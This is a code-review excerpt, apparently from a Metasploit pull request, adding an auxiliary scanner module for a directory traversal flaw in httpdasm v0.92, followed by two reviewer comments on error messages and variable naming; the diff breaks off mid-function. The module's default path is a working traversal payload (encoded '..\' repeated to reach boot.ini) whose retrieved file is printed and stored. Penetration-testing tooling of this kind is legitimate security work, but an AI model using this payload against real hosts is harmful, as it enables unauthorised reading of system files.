modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb

```diff
@@ -0,0 +1,48 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Httpdasm Directory Traversal',
+      'Description'    => %q{
+        This module allows for traversing the file system of a host running httpdasm v0.92.
+      },
+      'Author'         =>
+        [
+          'John Leitch', # EDB POC
+          'Shelby Pace' # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['EDB', '15861']
+        ]
+    ))
+
+    register_options(
+    [
+      OptString.new('TARGETURI', [true, 'Default path', '%2e%2e%5c' * 8 + 'boot.ini'])
+    ])
+
+  end
+
+  def run
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path)
+    })
+
+    if res && res.code == 200
+      print_status(res.body)
+      path = store_loot('httpdasm.file', 'application/octet-stream', rhost, res.body)
+    else
+      print_error("404 error")
```

Comment:
404 had been an example. The server could return anything. Suggest printing a more appropriate error when the response is not 200, such as `"Could not retrieve #{uri}"`. You'd want to have that variable after all.

Reply:
I'd also make the variable value `normalize_uri(target_uri.path)` and not `target_uri.path` alone: this keeps output consistent with action.